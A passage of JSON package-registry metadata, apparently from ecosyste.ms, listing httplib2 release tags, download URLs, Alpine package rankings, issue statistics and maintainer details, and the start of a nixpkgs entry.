.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T18:06:25.399Z","dependent_packages_count":4,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":5.5937084625609215,"stargazers_count":4.519273371732388,"forks_count":3.2454585733274257,"average":3.339610101905184},"purl":"pkg:apk/alpine/py-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.7","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T12:38:31.362Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages/py-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages/py-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages/py-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages/py-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages/py-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages/py-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":232,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-01T10:19:10.770Z","updated_at":"2023-02-01T10:19:10.770Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.7","url":"https://pkgs.alpinelinux.org/packages?branch=v3.7","ecosystem":"alpine","default":false,"packages_count":9028,"maintainers_count":126,"namespaces_count":2,"keywords_count":661,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":310},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.832Z","updated_at":"2026-08-16T05:05:01.411Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/namespaces"}},{"id":13203773,"name":"python312Packages.httplib2","ecosystem":"nixpkgs","description":"A comprehensive HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-02T00:56:38.861Z","latest_release_published_at":"2026-02-02T00:56:38.861Z","latest_release_number":"0.22.0","last_synced_at":"2026-03-07T09:03:53.455Z","created_at":"2026-02-02T00:56:08.813Z","updated_at":"2026-08-22T19:06:45.575Z","registry_url":"https://search.nixos.org/packages?channel=24.05\u0026query=python312Packages.httplib2","install_command":"nix-env -iA 